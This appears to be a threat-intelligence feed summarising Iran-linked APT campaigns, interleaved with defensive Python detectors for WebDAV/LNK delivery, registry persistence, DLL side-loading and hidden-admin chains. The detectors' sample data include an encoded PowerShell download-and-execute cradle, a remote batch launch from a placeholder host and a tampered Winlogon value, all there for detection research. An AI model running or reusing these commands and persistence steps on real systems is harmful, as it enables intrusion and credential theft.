Latest update: 21/11/2025

Threats Feed

  1. Public

    Inside SpearSpecter: Precision Social Engineering and TAMECAT Malware Operations

    Researchers uncovered SpearSpecter, an IRGC-IO–aligned cyber-espionage campaign targeting senior defense and government officials, alongside their family members, to expand pressure on primary targets. The group uses long-term social engineering, including WhatsApp engagement and impersonation of trusted contacts, to deliver highly personalized lures. Initial access relies on crafted meeting documents, WebDAV-based delivery, and malicious LNK shortcuts that launch TAMECAT, a modular PowerShell backdoor enabling reconnaissance, credential harvesting, browser data extraction, Outlook OST theft, screenshot capture, and encrypted exfiltration. SpearSpecter employs a resilient multi-channel C2 architecture using HTTPS, Telegram, and Discord, plus Cloudflare Workers for staging, reflecting a stealthy and persistent IRGC-linked intelligence-collection effort.
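The delivery chain above (shortcut launches a script host, payload fetched over WebDAV) leaves a recognisable shape in process-creation telemetry. The following is an added example, not code from the SpearSpecter research or the TAMECAT operators: it triages Sysmon-style process records for a WebDAV UNC path and for an encoded PowerShell command spawned by Explorer, decoding the `-EncodedCommand` argument so the analyst sees the plaintext. The sample records, the 203.0.113.10 host (a documentation address) and the use of `-enc` are assumptions for illustration; the page does not publish TAMECAT's actual command line.

```python
"""Added example (not from the SpearSpecter report or the TAMECAT authors):
triage process-creation records for two signals described above, a script host
launched via a shortcut and a WebDAV UNC path used for delivery. The records,
the WebDAV host and the '-enc' usage are constructed assumptions."""
import base64
import ntpath
import re

# WebDAV UNC forms accepted by the Windows WebClient (Mini-Redirector),
# e.g. \\host@SSL\DavWWWRoot\... or \\host@8080\...
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+@(?:ssl|\d{2,5})(?:\\|$)|davwwwroot", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; common ones listed.
ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext of a -EncodedCommand argument, or None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(records):
    """Flag records that reference a WebDAV UNC path (in the command line or in
    the decoded payload), or that are an encoded PowerShell command spawned by
    Explorer, which is what a double-clicked malicious .lnk produces."""
    findings = []
    for rec in records:
        image = ntpath.basename(rec["image"]).lower()
        parent = ntpath.basename(rec["parent"]).lower()
        decoded = None
        if image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(rec["cmdline"])
        reasons = []
        if WEBDAV_UNC.search(rec["cmdline"]) or (decoded and WEBDAV_UNC.search(decoded)):
            reasons.append("WebDAV UNC path in command line or decoded payload")
        if decoded and parent == "explorer.exe" and image in SCRIPT_HOSTS:
            reasons.append("encoded PowerShell spawned by Explorer (shortcut launch)")
        if reasons:
            findings.append({"pid": rec["pid"], "reasons": reasons, "decoded": decoded})
    return findings


# Constructed sample records (Sysmon event 1 style), not from any real incident.
_PAYLOAD = r"IEX (New-Object Net.WebClient).DownloadString('\\203.0.113.10@SSL\DavWWWRoot\meeting\agenda.ps1')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode()
SAMPLE_PROCESSES = [
    {"pid": 4412, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"pid": 4420, "parent": r"C:\Windows\explorer.exe",          # benign admin script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"pid": 4433, "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c \\203.0.113.10@SSL\DavWWWRoot\meeting\setup.bat"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_PROCESSES):
        print(f["pid"], f["reasons"], (f["decoded"] or "")[:70])
```

A WebDAV UNC is rare enough in most enterprise telemetry to alert on alone; the Explorer-spawned encoded command is noisier and is worth pairing with the decoded content (download cradles, `IEX`, remote paths) before paging anyone.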

  2. Public

    UNK_SmudgedSerpent: A New Iranian Espionage Cluster Targeting US Policy Experts

    Proofpoint uncovered a new Iranian-linked activity cluster, UNK_SmudgedSerpent, which overlaps with the known groups TA453 (Charming Kitten), TA455 (Smoke Sandstorm), and TA450 (MuddyWater). Active between June and August 2025, the cluster targeted US-based think tank and academic experts on Iranian affairs with phishing campaigns that impersonated Brookings and Washington Institute figures. The attacks began with benign email exchanges before transitioning to credential harvesting and the deployment of remote monitoring and management (RMM) tools such as PDQ Connect and ISL Online. The campaign's infrastructure and TTPs reflect Iran's broader intelligence-collection goals and the growing overlap between its contractor-operated cyber units.

  3. Public

    MuddyWater Unveils New Espionage Toolkit in Global Phishing Campaign

    Group-IB uncovered a global phishing campaign by the Iran-linked APT MuddyWater, targeting international and humanitarian organizations across the Middle East, Europe, Africa, and North America. The group used a compromised mailbox accessed via NordVPN to send phishing emails with malicious Word documents containing VBA macros that deployed the Phoenix backdoor v4 through the FakeUpdate injector. The malware achieved persistence via Winlogon registry keys and COM hijacking, while a custom browser credential stealer and RMM tools (PDQ, Action1) facilitated remote access and credential harvesting. The campaign reflects MuddyWater’s evolving espionage capabilities and integration of custom and legitimate tools for stealth operations.
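The two persistence locations named above, Winlogon values and COM hijacking, can be audited from a plain registry export. What follows is an added example, not Group-IB's code or MuddyWater tooling: it parses a `.reg` export, compares the Winlogon `Shell` and `Userinit` values to their stock defaults, and flags any per-user `InprocServer32` entry under `HKCU\Software\Classes\CLSID`, since a CLSID registered there takes precedence over the machine-wide copy for that user. The sample export, the CLSIDs and the file paths are constructed for illustration.

```python
"""Added example (not Group-IB's code or MuddyWater tooling): audit a Windows
registry export for Winlogon Shell/Userinit tampering and per-user COM CLSID
hijacks. The export, CLSIDs and paths below are constructed."""
import re

# Constructed sample .reg export (not from a real host). .reg files escape
# backslashes and quotes inside string data; the parser undoes that.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe"
"Userinit"="C:\\Windows\\system32\\userinit.exe,C:\\Users\\Public\\Libraries\\update.exe,"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{01234567-89ab-cdef-0123-456789abcdef}\InprocServer32]
@="C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\ph.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fedcba98-7654-3210-fedc-ba9876543210}\InprocServer32]
@="C:\\Windows\\System32\\shell32.dll"
'''

_KEY_LINE = re.compile(r"^\[(.+)\]$")
_VALUE_LINE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(?:"((?:[^"\\]|\\.)*)"|(.*))$')


def _unescape(s):
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Parse a .reg export into {key: {value_name: data}}. String data is
    unescaped; hex:/dword: data is kept raw. '@' is the default value."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_LINE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = _VALUE_LINE.match(line)
        if m and current is not None:
            name = _unescape(m.group(1)) if m.group(1) is not None else "@"
            data = _unescape(m.group(2)) if m.group(2) is not None else m.group(3)
            keys[current][name] = data
    return keys


WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Stock values on a default install; the trailing comma on Userinit is part of the default.
WINLOGON_DEFAULTS = {"Shell": "explorer.exe", "Userinit": r"C:\Windows\system32\userinit.exe,"}
USER_WRITABLE_HINTS = ("\\users\\", "\\programdata\\", "\\appdata\\", "\\temp\\")
# A CLSID under HKCU\Software\Classes overrides the HKLM copy for that user.
_HKCU_INPROC = re.compile(
    r"^HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\\{[0-9a-f-]{36}\}\\InprocServer32$", re.I)


def audit(keys):
    """Return findings for Winlogon tampering and per-user COM server overrides."""
    findings = []
    winlogon = keys.get(WINLOGON_KEY, {})
    for name, default in WINLOGON_DEFAULTS.items():
        data = winlogon.get(name)
        if data is not None and data.strip().lower() != default.lower():
            findings.append({"key": WINLOGON_KEY, "name": name, "data": data,
                             "reason": "Winlogon %s differs from stock value" % name})
    for key, values in keys.items():
        if _HKCU_INPROC.match(key):
            server = values.get("@", "")
            reason = "per-user InprocServer32 overrides the machine-wide CLSID"
            if any(h in server.lower() for h in USER_WRITABLE_HINTS):
                reason += "; server DLL lives in a user-writable path"
            findings.append({"key": key, "name": "@", "data": server, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit(parse_reg(SAMPLE_REG)):
        print(f["reason"], "->", f["data"])
```

Two caveats for real use: `reg export` writes UTF-16 with a BOM, so open the file with `encoding="utf-16"`; and `Shell` legitimately differs on kiosk or custom-shell builds, so compare against your own golden image rather than the stock defaults when those exist.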

  4. Public

    Nimbus Manticore Expands Cyber-Espionage Campaigns Across Europe

    Nimbus Manticore, an Iranian threat actor overlapping with UNC1549 and Smoke Sandstorm, has intensified its espionage operations against defense manufacturing, telecommunications, and aviation sectors in Western Europe, notably Denmark, Sweden, and Portugal. The group uses spear-phishing lures posing as HR recruiters to deliver multi-stage DLL side-loading malware via fake career portals. Its evolving toolset—MiniJunk backdoor and MiniBrowse stealer—employs advanced obfuscation, code signing, and cloud-based C2 infrastructure on Azure and Cloudflare to evade detection. The campaign reflects a highly sophisticated, well-resourced actor aligned with IRGC intelligence objectives.

  5. Public

    Subtle Snail's MINIBIKE Campaign Uses DLL Sideloading and Azure-Proxied C2

    Subtle Snail operators deploy the MINIBIKE backdoor via DLL sideloading to gain persistent, high-privilege access. The malware stages itself in the Public user's Documents folder using CopyFile2 and BITS, enforces single-instance execution with a UUID-named mutex, and derives a unique USERID from the username, hostname, and DLL timestamp for HTTP POST C2 over WinHTTP. Modular components include an LCG-obfuscated keylogger that writes encrypted extended0.log files, a browser stealer that pairs a Chrome App-Bound Encryption decryption tool with process hollowing, and a CredUI-based fake Outlook/Winlogon prompt that saves the credentials victims type in. Operators use Azure-proxied domains for C2, automated chunked exfiltration, WinRAR archiving, and anti-analysis techniques including control-flow flattening and dynamic API resolution. Targeted sectors include telecommunications organizations.
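Both the Nimbus Manticore and the Subtle Snail items above rely on DLL side-loading: a legitimate, signed executable loads a DLL by name from its own directory, and the attacker supplies that DLL. The following is an added example, not Check Point's, Zscaler's, or the operators' code: a heuristic over image-load telemetry that flags a DLL carrying a well-known system DLL name loaded from somewhere other than System32, and annotates whether it sits beside the executable, is unsigned, or lives in a user-writable path. The records, signer names, paths and the list of side-load-prone names are constructed assumptions for illustration.

```python
"""Added example (not Check Point's, Zscaler's or the operators' code): flag
DLL side-loading candidates in image-load telemetry. Records, signers, paths
and the list of commonly abused DLL names are constructed assumptions."""
import ntpath

# DLL names frequently abused for side-loading because many executables import
# them; representative, not exhaustive (assumption for this example).
SIDELOAD_PRONE_NAMES = {"version.dll", "cryptbase.dll", "dbghelp.dll", "msimg32.dll",
                        "wininet.dll", "winhttp.dll", "profapi.dll", "dwmapi.dll", "userenv.dll"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
USER_WRITABLE_HINTS = ("\\users\\", "\\programdata\\", "\\temp\\")


def _dir(path):
    # ntpath handles Windows paths on any platform; normcase lowercases them.
    return ntpath.normcase(ntpath.dirname(path))


def find_sideloads(loads):
    """Return one finding per suspicious image-load record."""
    findings = []
    for ev in loads:
        dll_name = ntpath.basename(ev["dll"]).lower()
        dll_dir, img_dir = _dir(ev["dll"]), _dir(ev["image"])
        if dll_name not in SIDELOAD_PRONE_NAMES or dll_dir in SYSTEM_DIRS:
            continue
        reasons = ["%s loaded from %s rather than System32" % (dll_name, dll_dir)]
        if dll_dir == img_dir:
            reasons.append("DLL sits beside the executable (search-order hit)")
        if ev.get("dll_signer") is None:
            reasons.append("DLL is unsigned")
        elif ev.get("dll_signer") != ev.get("image_signer"):
            reasons.append("DLL signer differs from executable signer")
        if any(h in dll_dir for h in USER_WRITABLE_HINTS):
            reasons.append("user-writable directory")
        findings.append({"pid": ev["pid"], "image": ev["image"], "dll": ev["dll"], "reasons": reasons})
    return findings


# Constructed sample records (Sysmon event 7 style), not from any real incident.
SAMPLE_LOADS = [
    {"pid": 5120, "image": r"C:\Users\bob\Downloads\CareerPortal\CareerPortal.exe",
     "image_signer": "Contoso Software Ltd",
     "dll": r"C:\Users\bob\Downloads\CareerPortal\version.dll", "dll_signer": None},
    {"pid": 5120, "image": r"C:\Users\bob\Downloads\CareerPortal\CareerPortal.exe",
     "image_signer": "Contoso Software Ltd",
     "dll": r"C:\Windows\System32\kernel32.dll", "dll_signer": "Microsoft Windows"},
    {"pid": 2210, "image": r"C:\Program Files\Vendor\app.exe", "image_signer": "Vendor Inc",
     "dll": r"C:\Windows\System32\version.dll", "dll_signer": "Microsoft Windows"},
]

if __name__ == "__main__":
    for f in find_sideloads(SAMPLE_LOADS):
        print(f["pid"], f["dll"])
        for r in f["reasons"]:
            print("   -", r)
```

The name list is the weak point of any such rule: installers and portable apps do ship their own copies of some of these DLLs, so treat a hit as a triage lead and pivot on the signer mismatch and the directory before escalating.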

  6. Public

    Homeland Justice Phishing Operation Hits Diplomatic and Government Sectors Globally

    An Iran-aligned threat actor linked to the MOIS-affiliated group Homeland Justice conducted a large-scale spear-phishing campaign in August 2025, using a compromised mailbox of the Omani Ministry of Foreign Affairs to target embassies, consulates, and international organizations worldwide. The malicious Word attachments, disguised as official diplomatic notices, executed VBA macros that decoded and dropped the sysProcUpdate malware. Targets included diplomatic and government institutions across Europe, the Middle East, Africa, Asia, and the Americas, notably during sensitive ceasefire negotiations. The operation aimed at espionage and reconnaissance, leveraging obfuscation, sandbox evasion, and encrypted C2 communication with screenai[.]online.

  7. Public

    MuddyWater Targets CFOs Worldwide with Multi-Stage Phishing and NetBird Abuse

    APT MuddyWater has launched a multi-stage spear-phishing campaign targeting CFOs and finance executives across Europe, North America, South America, Africa, and Asia. Disguised as recruiters from Rothschild & Co, the attackers use Firebase-hosted phishing pages with CAPTCHA lures and malicious ZIP/VBS payloads to deploy legitimate remote-access tools like NetBird and OpenSSH for persistent control. The infection chain creates hidden admin accounts, enables RDP, and automates persistence via scheduled tasks. Infrastructure analysis reveals overlaps with earlier MuddyWater operations, confirming attribution and highlighting the group’s evolving phishing toolkit and adaptive use of trusted cloud services for global financial espionage.

  8. Public

    New Charming Kitten Operation Blends Long-Term Reconnaissance and WebSocket Phishing

    The new Charming Kitten campaign demonstrates a significant escalation in the group’s operational maturity, combining strategic impersonation, long-term reconnaissance, and a large, automated infrastructure. The attackers impersonated Pentagon official Ariane Tabatabai to target Iranian activists, initiating contact via Telegram before redirecting victims through Google Sites to credential-harvesting domains using a WebSocket-based phishing kit. Evidence shows the group monitored security researcher activity for months, preparing infrastructure from May and launching operations in late July. More than 30 previously unseen domains support the campaign, reflecting increased automation, operational scale, and real-time monitoring. The operation highlights Charming Kitten’s growing geopolitical awareness and refined social engineering capability.

  9. Public

    MuddyWater Deploys New Android Spyware Amid Israel-Iran Conflict

    Iranian APT group MuddyWater deployed new versions of its Android surveillanceware DCHSpy amid the Israel-Iran conflict, targeting individuals via politically themed lures such as fake Starlink VPN apps. Distributed through Telegram and disguised as legitimate VPN or banking apps, DCHSpy harvests sensitive data including WhatsApp messages, SMS, call logs, contacts, device location, and audio. The malware compresses and encrypts exfiltrated data before uploading it to an attacker-controlled SFTP server. DCHSpy shares infrastructure with SandStrike, a tool previously used to target Baháʼí practitioners. Sectors targeted include telecommunications, defense, local government, and oil and gas across the Middle East, Asia, Africa, Europe, and North America.

  10. Public

    Fox Kitten-Linked Ransomware Operation Hits $4M in Geopolitical Cyber Campaign

    Since February 2025, the Iranian-aligned Pay2Key.I2P ransomware-as-a-service (RaaS) operation—linked to Fox Kitten APT and Mimic ransomware—has launched ideologically driven attacks against Western targets. With a strong presence on Russian and Chinese darknet forums, the group markets an advanced ransomware builder with capabilities for both Windows and Linux. The payloads use advanced evasion techniques, including dual CMD/PowerShell scripts, Themida packing, and AV bypass tools like “NoDefender.” Over $4 million in ransom payments and 51 successful attacks were recorded in four months. Targets are not specified by country or sector, but the campaign’s rhetoric and infrastructure indicate a focus on geopolitical adversaries of Iran.

  11. Public

    Educated Manticore Targets Israeli Tech Academics with Advanced Phishing Kit

    Educated Manticore, an Iranian APT group linked to the IRGC Intelligence Organization, launched spear-phishing campaigns targeting Israeli cybersecurity experts, computer science academics, and journalists. Using personas of fake cybersecurity employees or researchers, attackers engaged victims via email and WhatsApp, luring them to phishing pages disguised as Google or Google Meet login portals. A custom React-based phishing kit captured credentials and two-factor authentication tokens in real time via WebSocket, supported by infrastructure spanning over 130 attacker-controlled domains. The campaign emphasizes credential harvesting and identity theft in support of Iranian cyber-espionage objectives amid heightened Iran–Israel tensions.

  12. Public

    BladedFeline Targets Iraq and Kurdistan Governments with Custom Malware Arsenal

    BladedFeline, an Iran-aligned APT group likely linked to OilRig (APT34), has conducted a multi-year cyberespionage campaign targeting Kurdish and Iraqi government officials as well as a telecommunications provider in Uzbekistan. Active since at least 2017, the group deployed various custom tools—including the Shahmaran and Whisper backdoors, the PrimeCache IIS module, reverse tunnels (Laret and Pinar), and several post-compromise implants—to maintain long-term access. Whisper abuses Microsoft Exchange email infrastructure for covert C2, while PrimeCache is a malicious IIS module that runs inside the web server itself. This activity highlights Iran's strategic interest in regional political and telecommunications sectors.

  13. Public

    Global Financial Executives Hit by Multi-Stage Phishing Operation

    A sophisticated spear-phishing campaign targeted CFOs and finance executives in banking, energy, insurance, and investment sectors across the UK, Canada, South Africa, Norway, South Korea, Singapore, Switzerland, France, Egypt, Saudi Arabia, and Brazil. Disguised as a Rothschild & Co recruiter, the attackers used Firebase-hosted phishing pages protected by custom CAPTCHAs to deliver multi-stage payloads. Victims who executed malicious VBS scripts unknowingly installed NetBird and OpenSSH, granting attackers persistent, encrypted remote access through hidden admin accounts and RDP activation. Trellix researchers identified infrastructure overlaps with previous nation-state campaigns but withheld attribution.
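Items 7 and 13 describe the same post-execution chain: a hidden local administrator account, RDP switched on, and a scheduled task for persistence. Each of those events is common on its own; together on one host within minutes they are not. The following is an added example, not Trellix's or any vendor's detection content: it correlates normalised host events (Windows Security 4720, 4732, 4698 and a Sysmon 13 registry write to `fDenyTSConnections`) per host inside a sliding window and emits one alert when all four signals are present. The records, host names, account name, task name and the 30-minute window are constructed assumptions.

```python
"""Added example (not Trellix's or Proofpoint's detection content, nor the
attackers' tooling): correlate per-host events for the account + RDP +
scheduled-task chain described above. Records, host/account/task names and
the window size are constructed assumptions."""
from datetime import datetime, timedelta

REQUIRED = {"account_created", "added_to_admins", "rdp_enabled", "task_created"}
DEFAULT_WINDOW = timedelta(minutes=30)


def classify(ev):
    """Map one normalised event to a chain signal, or None if irrelevant."""
    eid = ev["id"]
    if eid == 4720:                                   # local account created
        return "account_created"
    if eid == 4732 and ev.get("group", "").lower() == "administrators":
        return "added_to_admins"                      # member added to Administrators
    if eid == 13 and ev.get("target", "").lower().endswith("fdenytsconnections"):
        # Sysmon reports the data as e.g. "DWORD (0x00000000)"; a SIEM may normalise it to "0".
        if str(ev.get("value", "")).strip().lower() in ("0", "dword (0x00000000)"):
            return "rdp_enabled"
    if eid == 4698:                                   # scheduled task created
        return "task_created"
    return None


def correlate(events, window=DEFAULT_WINDOW):
    """Return one alert per host on which every REQUIRED signal occurs within `window`."""
    per_host = {}
    for ev in events:
        sig = classify(ev)
        if sig:
            per_host.setdefault(ev["host"], []).append((datetime.fromisoformat(ev["ts"]), sig, ev))
    alerts = []
    for host, items in per_host.items():
        items.sort(key=lambda t: t[0])
        for i, (start, _, _) in enumerate(items):
            seen = {}
            for ts, sig, ev in items[i:]:
                if ts - start > window:
                    break
                seen.setdefault(sig, ev)              # keep the earliest instance of each signal
            if REQUIRED.issubset(seen):
                last = max(datetime.fromisoformat(e["ts"]) for e in seen.values())
                alerts.append({"host": host,
                               "account": seen["account_created"].get("user"),
                               "task": seen["task_created"].get("task"),
                               "first": start.isoformat(), "last": last.isoformat()})
                break                                 # one alert per host is enough for triage
    return alerts


# Constructed sample events (not from any real incident).
SAMPLE_EVENTS = [
    {"ts": "2025-06-01T09:02:11", "host": "FIN-LT-042", "id": 4720, "user": "svc_update"},
    {"ts": "2025-06-01T09:02:14", "host": "FIN-LT-042", "id": 4732, "user": "svc_update", "group": "Administrators"},
    {"ts": "2025-06-01T09:02:20", "host": "FIN-LT-042", "id": 13,
     "target": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "value": "DWORD (0x00000000)"},
    {"ts": "2025-06-01T09:02:31", "host": "FIN-LT-042", "id": 4698, "task": r"\Updater\Sync"},
    # Benign noise elsewhere: an admin creates an account and nothing else follows.
    {"ts": "2025-06-01T10:15:00", "host": "IT-WS-007", "id": 4720, "user": "contractor1"},
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(a)
```

The window is the tuning knob: an interactive operator working through a VBS stager completes the chain in seconds to minutes, while legitimate provisioning usually spreads these steps across separate change tickets and hours, so a short window keeps the rule quiet without losing the campaign shape.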

  14. Public

    Iranian APT Impersonates German Model Agency in Espionage Operation

    Suspected Iranian threat actors, likely linked to APT35 (Agent Serpens), created a fraudulent website impersonating Germany's Mega Model Agency to conduct targeted espionage. The site collects extensive visitor data—including IP addresses, browser fingerprints, and screen resolutions—using obfuscated JavaScript to enable selective targeting. A fake model profile and an inactive album link suggest planned social engineering. Although no victim interaction was confirmed, the infrastructure and tactics indicate preparation for spear phishing. The campaign targets dissidents, journalists, and activists abroad, especially in Germany, aligning with the group's history of surveillance and influence operations against Iranian opposition figures.

  15. Public

    Avast-Themed Phishing Campaign Targets Israeli Businesses with ScreenConnect RAT

    A phishing campaign impersonating Avast targeted Israeli individuals and businesses—likely in the real estate and commercial sectors—through fraudulent antivirus receipts containing malware download links. The attack used multiple URL redirections and GitHub for payload delivery, culminating in the stealthy installation of the legitimate remote access tool ScreenConnect. Once installed, ScreenConnect ran as a Windows service for persistence, and the operators modified authentication packages to access credentials and established encrypted command and control connections. Evidence suggests similarities with tactics used by the MuddyWater APT group, though attribution remains inconclusive. The campaign's infrastructure and system language checks confirm its Israeli focus.

  16. Public

    MuddyWater Deploys Macro-Enabled Documents to Deliver VBScript Backdoor

    The MuddyWater APT group has been observed using malicious macro-enabled Microsoft Word documents to compromise targets. Once a recipient opens the document and enables macros, a VBScript backdoor is deployed that communicates with attacker-controlled command and control (C2) servers over HTTP(S). The backdoor polls the C2 servers for commands, executes them, and returns the results. Identified infrastructure includes domains and IP addresses using HTTPS over port 443, which blends with ordinary web traffic and aids firewall evasion.

  17. Public

    APT34 Targets Iraqi Government with Dual-Channel C2 and Obfuscated Backdoors

    APT34 (OilRig) has launched a targeted cyber espionage campaign against Iraqi government entities since 2024, using spearphishing emails with forged documents to deploy custom C# malware disguised as PDF files. The malware performs system reconnaissance, anti-VM checks, and sets up persistence via scheduled tasks. It communicates with command-and-control infrastructure through both HTTP and compromised Iraqi government email accounts (SMTP/IMAP). The group also utilizes European-hosted infrastructure with deceptive 404 pages and obfuscated communication protocols. Targeted sectors include government, energy, finance, defense, and telecommunications, indicating a continued focus on intelligence gathering in the Middle East.

  18. Public

    BellaCPP: Charming Kitten's Latest Malware Innovation in Asia

    Kaspersky has uncovered BellaCPP, a C++ variant of the BellaCiao malware family attributed to the Charming Kitten threat actor. BellaCPP, found on an infected machine in Asia, implements domain generation, XOR-encrypted string decryption, and SSH tunneling, and stores its payloads in system directories such as C:\Windows\System32. Unlike BellaCiao it carries no webshell component. PDB paths embedded in the samples reveal targeting details and show the family's capabilities evolving. Indicators written for BellaCiao's .NET samples will not necessarily match this C++ variant, so defenders should hunt for its DGA domains and unexpected SSH tunnels rather than rely on file hashes alone.

  19. Public

    OilRig's Cyber Tactics: Targeting Middle East Sectors with Stealthy Attacks

    OilRig (APT34) has targeted the government, technology, and energy sectors across the Middle East. Its operations include spearphishing campaigns, PowerShell-based backdoors (Helminth, QUADAGENT), and exploitation of vulnerabilities such as CVE-2024-30088, a Windows kernel privilege-escalation flaw. The group relies on obfuscation to evade detection, escalates privileges and moves laterally after initial access, and uses tools such as the STEALHOOK backdoor to exfiltrate stolen data. Key targets include Saudi Arabian organisations and Middle Eastern government agencies, highlighting OilRig's focus on geopolitical intelligence gathering. The campaigns demonstrate advanced persistence, stealth, and adaptability in line with state-sponsored objectives.

  20. Public

    CyberAv3ngers’ Malware Hits IoT/OT Systems in Fuel and Energy Sectors

    Team82's research details the IOCONTROL malware, a custom-built cyberweapon used by Iran-linked attackers, specifically the CyberAv3ngers group. The malware targets a range of industrial control systems (ICS) and Internet of Things (IoT) devices, notably impacting fuel management systems in Israel and the US. IOCONTROL's functionality includes communication via the MQTT protocol and features such as arbitrary code execution and self-deletion. The analysis reveals the malware's infrastructure, including its command-and-control server and the methods used to evade detection. The report concludes that IOCONTROL represents a significant threat to critical infrastructure, highlighting the ongoing geopolitical conflict.

  21. Public

    APT35 Targets Aerospace and Semiconductor Sectors Across Multiple Countries

    APT35 targeted the aerospace and semiconductor industries in the US, Thailand, UAE, and Israel using fake recruitment and corporate websites. These sites delivered malware through trojanized copies of legitimate programs paired with malicious DLLs to compromise victims. The group leveraged platforms like GitHub, OneDrive, and Google Cloud for C&C communications and payload delivery. In a related attack, a semiconductor company was targeted using a VPN program laced with malicious components. Persistence mechanisms included registry modifications, while obfuscation techniques were used to evade detection. APT35's activities are linked to the Islamic Revolutionary Guard Corps (IRGC) of Iran.

  22. Public

    MuddyWater Campaign Targets Israeli Organizations with RMM Tool Misuse

    Sophos MDR has identified a targeted phishing campaign, with moderate confidence attributed to the Iranian-linked threat actor group MuddyWater (TA450), which targeted organisations in Israel. The campaign involved phishing emails that tricked users into downloading a ZIP file containing an installer for the legitimate remote management tool Atera. After gaining access, the threat actors misused Atera, using a trial account believed to be compromised, to install the Atera Agent and run a PowerShell script for credential dumping and creating a backup of the SYSTEM registry hive, which Sophos behavioural rules detected and blocked. Post-compromise activities included domain enumeration commands, establishing an SSH tunnel to a remote IP address, and downloading another remote management tool, Level RMM, via an obfuscated PowerShell command. This campaign's tactics align with previously reported activity by TA450 and highlights the tactic of abusing legitimate software for malicious purposes.

  23. Public

    Fake Assassination News Used in Phishing Attack Impersonating The New York Times

    A phishing campaign is exploiting sensational fake news about an assassination attempt on US President-elect Donald Trump by an Iranian sniper. The campaign poses as The New York Times using the email address newyork-times@nycmail[.]com. Victims who click on the embedded link are redirected to an ESET-imitation phishing site, where they are prompted to enter corporate domain credentials. This campaign is an example of attackers using major global events, such as political elections, to amplify their efforts. The use of urgency and sensational headlines highlights the need for vigilance in verifying information.

  24. Public

    Fake Chrome Updates and Modular Malware: The WezRat Threat

    The WezRat malware, attributed to the Iranian group Emennet Pasargad, has targeted organizations in Israel, the US, France, and Sweden across sectors such as telecommunications, streaming services, and athletics. Delivered via phishing campaigns impersonating the Israeli National Cyber Directorate, WezRat employs modular functionality for data theft, command execution, and surveillance. The group also leveraged disinformation campaigns, hacking SMS services, IPTV systems, and display providers to broadcast propaganda. Recent campaigns include a fake Chrome update targeting Israeli entities. The malware employs obfuscation, persistence mechanisms, and C&C communication to evade detection and maintain control.
